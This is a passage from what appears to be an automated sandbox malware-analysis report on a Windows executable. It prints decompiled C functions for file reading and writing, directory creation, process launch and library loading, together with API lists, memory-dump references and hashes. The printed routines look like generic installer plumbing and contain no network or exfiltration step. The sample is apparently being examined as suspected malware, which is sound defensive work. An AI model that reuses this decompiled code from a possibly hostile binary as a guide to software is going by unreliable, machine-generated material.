                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: ObjectSingleWait$CodeExitProcess
                            • String ID:
                            • API String ID: 2567322000-0
                            • Opcode ID: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                            • Instruction ID: dffe0f0baa3edeb4a8159ab808a8d66eaa88359a938bc324e0f181ad12cbd91f
                            • Opcode Fuzzy Hash: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                            • Instruction Fuzzy Hash: 36E09236600118FBDB00AB54DD05E9E7B6ADB45704F114036FA05B6190C6B1AE22DA94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040620A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0040620A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                            0x0040620e
                            0x0040621e
                            0x00406226
                            0x00000000
                            0x0040622d
                            0x00000000
                            0x0040622f

                            APIs
                            • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040FB8E,ndidateListW,00403579,ndidateListW,0040FB8E,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: FileWrite
                            • String ID: ndidateListW
                            • API String ID: 3934441357-425658952
                            • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                            • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                            • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                            • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004061DB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E004061DB(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                            0x004061df
                            0x004061ef
                            0x004061f7
                            0x00000000
                            0x004061fe
                            0x00000000
                            0x00406200

                            APIs
                            • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,ndidateListW,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: FileRead
                            • String ID: ndidateListW
                            • API String ID: 2738559852-425658952
                            • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                            • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                            • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                            • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00403371 Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                            Download Yara Rule
                            C-Code - Quality: 92%
                            			E00403371(void* __ecx, long _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t29;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a2b8;
					 *0x420ef4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403479(4);
				if(_t22 >= 0) {
					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x420ef4 =  *0x420ef4 + 4;
						_t36 = E00403479(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x420ef4 =  *0x420ef4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
										if(_t29 == 0) {
											goto L18;
										}
										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x420ef4 =  *0x420ef4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}















                            0x00403375
                            0x0040337e
                            0x00403387
                            0x0040338b
                            0x00403396
                            0x00403396
                            0x0040339e
                            0x004033a5
                            0x004033b7
                            0x004033be
                            0x00403463
                            0x00403463
                            0x00000000
                            0x004033c4
                            0x004033c7
                            0x004033d3
                            0x004033d7
                            0x00403471
                            0x00403471
                            0x004033dd
                            0x004033e0
                            0x0040343f
                            0x00403445
                            0x00403447
                            0x00403447
                            0x00403459
                            0x00403461
                            0x00403468
                            0x0040346b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004033e2
                            0x004033e5
                            0x00000000
                            0x004033eb
                            0x004033f0
                            0x004033f7
                            0x004033fa
                            0x004033fc
                            0x004033fc
                            0x00403409
                            0x0040340c
                            0x00403413
                            0x00000000
                            0x00000000
                            0x0040341c
                            0x00403423
                            0x0040343b
                            0x00403465
                            0x00403465
                            0x00403425
                            0x00403425
                            0x00403428
                            0x0040342b
                            0x00403431
                            0x00403437
                            0x00000000
                            0x00403439
                            0x00000000
                            0x00403439
                            0x00403437
                            0x00000000
                            0x00403423
                            0x00000000
                            0x004033f0
                            0x004033e5
                            0x004033e0
                            0x004033d7
                            0x004033be
                            0x00403473
                            0x00403476

                            APIs
                            • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: FilePointer
                            • String ID:
                            • API String ID: 973152223-0
                            • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                            • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                            • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                            • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                            Download Yara Rule
                            C-Code - Quality: 86%
                            			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE2(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F64(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C16( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B99( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406668(0x436000,  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                            0x004015c1
                            0x004015c9
                            0x004015cc
                            0x004015d1
                            0x004015d5
                            0x004015d7
                            0x004015df
                            0x004015e1
                            0x004015e4
                            0x004015ea
                            0x00401604
                            0x00401607
                            0x004015ec
                            0x004015ec
                            0x004015ef
                            0x00000000
                            0x004015fa
                            0x004015fd
                            0x004015fd
                            0x004015ef
                            0x0040160e
                            0x00401615
                            0x00401624
                            0x00401624
                            0x00401617
                            0x0040161a
                            0x00401622
                            0x00000000
                            0x00000000
                            0x00401622
                            0x00401615
                            0x00401627
                            0x0040162b
                            0x0040162c
                            0x004015d7
                            0x00401634
                            0x00401663
                            0x004022f1
                            0x00401636
                            0x00401638
                            0x00401645
                            0x0040164d
                            0x00401655
                            0x0040165b
                            0x0040165b
                            0x00401655
                            0x00402c2d
                            0x00402c39

                            APIs
                              • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,766DFAA0,?,766DF560,00405D94,?,766DFAA0,766DF560,00000000), ref: 00405FF0
                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                              • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                            • SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                            • String ID:
                            • API String ID: 1892508949-0
                            • Opcode ID: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                            • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                            • Opcode Fuzzy Hash: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                            • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 69%
                            			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a290;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42924c =  *0x42924c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
					}
				}
				return 0;
			}











                            0x0040138a
                            0x004013fa
                            0x0040139b
                            0x004013a0
                            0x00000000
                            0x00000000
                            0x004013a2
                            0x004013a3
                            0x004013ad
                            0x00000000
                            0x00401404
                            0x004013b0
                            0x004013b7
                            0x004013bd
                            0x004013be
                            0x004013c0
                            0x004013c2
                            0x004013b9
                            0x004013b9
                            0x004013ba
                            0x004013ba
                            0x004013c9
                            0x004013cb
                            0x004013f4
                            0x004013f4
                            0x004013c9
                            0x00000000

                            APIs
                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                            • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID:
                            • API String ID: 3850602802-0
                            • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                            • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                            • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                            • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00405C4B Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00405C4B(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426750->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                            0x00405c54
                            0x00405c74
                            0x00405c7c
                            0x00405c81
                            0x00000000
                            0x00405c87
                            0x00405c8b

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: CloseCreateHandleProcess
                            • String ID:
                            • API String ID: 3712363035-0
                            • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                            • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                            • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                            • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00406A35 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00406A35(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069C5(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                            0x00406a3d
                            0x00406a40
                            0x00406a47
                            0x00406a4f
                            0x00406a5b
                            0x00000000
                            0x00406a62
                            0x00406a52
                            0x00406a59
                            0x00000000
                            0x00406a6a
                            0x00000000

                            APIs
                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                              • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                              • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                              • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                            • String ID:
                            • API String ID: 2547128583-0
                            • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                            • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                            • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                            • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00406158 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 68%
                            			E00406158(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                            0x0040615c
                            0x00406169
                            0x0040617e
                            0x00406184

                            APIs
                            • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\YSpCB8DEek.exe,80000000,00000003), ref: 0040615C
                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: File$AttributesCreate
                            • String ID:
                            • API String ID: 415043291-0
                            • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                            • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                            • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                            • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00406133 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00406133(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}





                            0x00406138
                            0x0040613e
                            0x00406143
                            0x0040614c
                            0x0040614c
                            0x00406155

                            APIs
                            • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                            • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
